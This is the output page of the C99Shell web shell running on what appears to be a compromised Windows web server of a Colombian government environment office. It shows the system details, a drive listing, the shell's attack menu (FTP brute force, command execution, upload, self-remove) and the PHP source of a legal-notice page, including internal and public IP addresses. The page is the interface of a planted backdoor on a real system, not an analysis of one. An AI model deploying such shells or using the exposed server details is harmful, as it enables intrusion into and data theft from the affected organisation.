!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

E:\nuevo\htdocs\BLA2\boletinlegal\   drwxrwxrwx
Free 9.41 GB of 239.26 GB (3.93%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     notificaciones.php (6.75 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Notificaciones por Aviso</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<link href="styles2.css" rel="stylesheet" type="text/css"  />
<script type="text/javascript" src="js/jquery.js"></script>
<script type="text/javascript" src="js/jquery.scrollTo-min.js"></script>
<script type="text/javascript" src="js/jquery.scrollShow.js"></script>

</head>
<body>

<h1 align="center">Notificaciones por aviso</h1>

  <p><br>
</p>



    <h3 align="justify" style="color:#666">La Secretaría Distrital de Ambiente en atención a la modificación en la forma de realizar la notificación de los actos administrativos de carácter particular consagrado en el artículo 69 de la Ley 1437 de 2011 y en particular &ldquo;…cuando se desconozca la información sobre el destinatario, el aviso, con copia íntegra del acto administrativo, se publicará en la página electrónica y en todo caso en un lugar de acceso al publico de la respectiva entidad por término de cinco (5) días. Con la advertencia de que la notificación se considera surtida al finalizar el día siguiente del retiro del aviso&rdquo;.  <br /></h3>


<?php // header( 'Content-type: text/html; charset=iso-8859-1' );
include ("conex.php");

$zone=3600*-5;
$hoy=gmdate("Y-m-d"time() + $zone);
//echo $date;
$order " order by id desc ";    
$sqlt "select id,no,DATE_FORMAT(fecha,'%d-%m-%Y') AS fecha,resuelve,usuario,sector,tipo,DATE_FORMAT(fijacion,'%d-%m-%Y') AS fijacion,DATE_FORMAT(desfijacion,'%d-%m-%Y') AS desfijacion from notificaciones where tipo = 'RESOLUCIONES' and '$hoy' >= fijacion  and '$hoy' <= desfijacion";
$sqldef=$sqlt.$order;
//echo "$sqldef";
$sql=mysql_query($sqldef,$con);

$num_rows mysql_num_rows($sql);
//muestra los datos consultados
echo "<table>
    <caption>
    <h3>Resoluciones: 
$num_rows </h5>
        
    <br />
      <br />  </h3>
    </caption>
    <thead>
    <tr class='odd'>

        <th scope='col' abbr='Home'><h5><span></span>Nombre(s)</h5></th>
        <th scope='col' abbr='Home'><h5><span></span>No.</h5></th>
        <th scope='col' abbr='Home'><h5><span></span>Sector</h5></th>
        <th scope='col' abbr='Home'><h5><span></span>Expedición</h5></th>
        <th scope='col' abbr='Home'><h5><span></span>Fijación</h5></th>
        <th scope='col' abbr='Home'><h5><span></span>Desfijación</h5></th>
        <th scope='col' abbr='Home'><h5><span></span>Archivo</h5></th>


    </tr>    
    </thead>
    <tfoot>"
;
while(
$row mysql_fetch_array($sql)){

$cont=$cont+1;

if (
$cont == 0)
$class"class='odd'";

if (
$cont == 1)
$class"";

$year1=date("Y"strtotime($row[fecha]));

$ip 'http://192.168.173.36/BLA';
$acto=strtoupper($table);
echo 
"
<tr 
$class>
        <th>
$row[usuario]</th>
        <td>
$row[no]</td>
        <td>
$row[sector]</td>
        <td>
$row[fecha]</td>
        <td>
$row[fijacion]</td>
        <td>
$row[desfijacion]</td>
        <td><A href='
$ip/resoluciones/Notificaciones/$row[tipo] $year1/$row[no].doc' target=_blank><img src='images/word.png' width='32' height='32' border='0' align='absmiddle' /></a></td></tr>
        
        "
;
        
}
echo 
"</table>";
///////////////

$order " order by id desc ";    

$sqlt "select id,no,DATE_FORMAT(fecha,'%d-%m-%Y') AS fecha,resuelve,usuario,sector,tipo,DATE_FORMAT(fijacion,'%d-%m-%Y') AS fijacion,DATE_FORMAT(desfijacion,'%d-%m-%Y') AS desfijacion from notificaciones where tipo = 'AUTOS' and '$hoy' >= fijacion  and '$hoy' <= desfijacion";
$sqldef=$sqlt.$order;
//echo "$sqldef";
$sql=mysql_query($sqldef,$con);

$num_rows mysql_num_rows($sql);
//muestra los datos consultados
echo "<table>
    <caption>
    <h3>Autos: 
$num_rows </h3>
        
    <br />
      <br />
    </caption>
    <thead>
    <tr class='odd'>

        <th scope='col' abbr='Home'><h5><span></span>Nombre(s)</h5></th>
        <th scope='col' abbr='Home'><h5><span></span>No.</h5></th>
        <th scope='col' abbr='Home'><h5><span></span>Sector</h5></th>
        <th scope='col' abbr='Home'><h5><span></span>Expedición</h5></th>
        <th scope='col' abbr='Home'><h5><span></span>Fijación</h5></th>
        <th scope='col' abbr='Home'><h5><span></span>Desfijación</h5></th>
        <th scope='col' abbr='Home'><h5><span></span>Archivo</h5></th>


    </tr>    
    </thead>
    <tfoot>"
;
while(
$row mysql_fetch_array($sql)){

$cont=$cont+1;

if (
$cont == 0)
$class"class='odd'";

if (
$cont == 1)
$class"";

$year1=date("Y"strtotime($row[fecha]));

$ip 'http://190.27.245.106/BLA';
$acto=strtoupper($table);

echo 
"
<tr 
$class>
        <th>
$row[usuario]</th>
        <td>
$row[no]</td>
        <td>
$row[sector]</td>
        <td>
$row[fecha]</td>
        <td>
$row[fijacion]</td>
        <td>
$row[desfijacion]</td>
        <td><A href='
$ip/resoluciones/Notificaciones/$row[tipo] $year1/$row[no].doc' target=_blank><img src='images/word.png' border='0' align='absmiddle' /></a></td></tr>
        
        "
;

}
echo 
"</table>";

$order " order by id desc ";    

$sqlt "select id,no,DATE_FORMAT(fecha,'%d-%m-%Y') AS fecha,resuelve,usuario,sector,tipo,DATE_FORMAT(fijacion,'%d-%m-%Y') AS fijacion,DATE_FORMAT(desfijacion,'%d-%m-%Y') AS desfijacion from notificaciones where tipo = 'REGISTROS' and '$hoy' >= fijacion  and '$hoy' <= desfijacion";
$sqldef=$sqlt.$order;
//echo "$sqldef";
$sql=mysql_query($sqldef,$con);

$num_rows mysql_num_rows($sql);
//muestra los datos consultados
echo "<table>
    <caption>
    <h3>Registros: 
$num_rows </h3>
        
    <br />
      <br />
    </caption>
    <thead>
    <tr class='odd'>

        <th scope='col' abbr='Home'><h5><span></span>Nombre(s)</h5></th>
        <th scope='col' abbr='Home'><h5><span></span>No.</h5></th>
        <th scope='col' abbr='Home'><h5><span></span>Sector</h5></th>
        <th scope='col' abbr='Home'><h5><span></span>Expedición</h5></th>
        <th scope='col' abbr='Home'><h5><span></span>Fijación</h5></th>
        <th scope='col' abbr='Home'><h5><span></span>Desfijación</h5></th>
        <th scope='col' abbr='Home'><h5><span></span>Archivo</h5></th>


    </tr>    
    </thead>
    <tfoot>"
;
while(
$row mysql_fetch_array($sql)){

$cont=$cont+1;

if (
$cont == 0)
$class"class='odd'";

if (
$cont == 1)
$class"";

$year1=date("Y"strtotime($row[fecha]));

$ip 'http://190.27.245.106/BLA';
$acto=strtoupper($table);

echo 
"
<tr 
$class>
        <th>
$row[usuario]</th>
        <td>
$row[no]</td>
        <td>
$row[sector]</td>
        <td>
$row[fecha]</td>
        <td>
$row[fijacion]</td>
        <td>
$row[desfijacion]</td>
        <td><A href='
$ip/resoluciones/Notificaciones/$row[tipo] $year1/$row[no].doc' target=_blank><img src='images/word.png' border='0' align='absmiddle' /></a></td></tr>
        
        "
;

}
echo 
"</table>";

?>

</body>
</html>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0156 ]--